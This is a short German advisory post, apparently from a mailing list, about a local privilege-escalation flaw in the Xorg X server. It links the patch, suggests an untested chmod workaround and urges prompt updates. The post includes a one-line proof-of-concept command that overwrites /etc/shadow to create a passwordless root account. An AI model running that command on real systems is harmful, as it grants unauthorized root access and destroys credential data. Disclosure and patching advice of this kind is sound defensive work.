Hallo zusammen,
sofern nicht selber schon gesehen/-lesen hier [0] FYI
"Incorrect permission check in Xorg X server allows for privilege escalation"
Ein möglicher PoC wäre
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
Ein Patch ist auf [1] verfügar. Sobald es über die Repos der jeweiligen Distribution bereit steht, sollte das Update vor allem bei Mehrbenutzersystemen asap installiert werden.
Ein vorgestellter (noch nicht getesteter) workaround wäre
chmod 755 (bzw. chmod u-s) auf das installierte Xorg Binary
Betroffen sind xorg-server ab Version 1.19.0 - hier tauchte der Commit [2], über den ein LPE (local privilege escalation) möglich ist, zum ersten Mal auf.
VG
Bernd
[0] https://bugzilla.redhat.com/show_bug.cgi?id=1643131
[1] https://gitlab.freedesktop.org/xorg/xserver/commit/50c0cf885a6e91c0ea71fb49f...
[2] https://gitlab.freedesktop.org/xorg/xserver/commit/032b1d79b7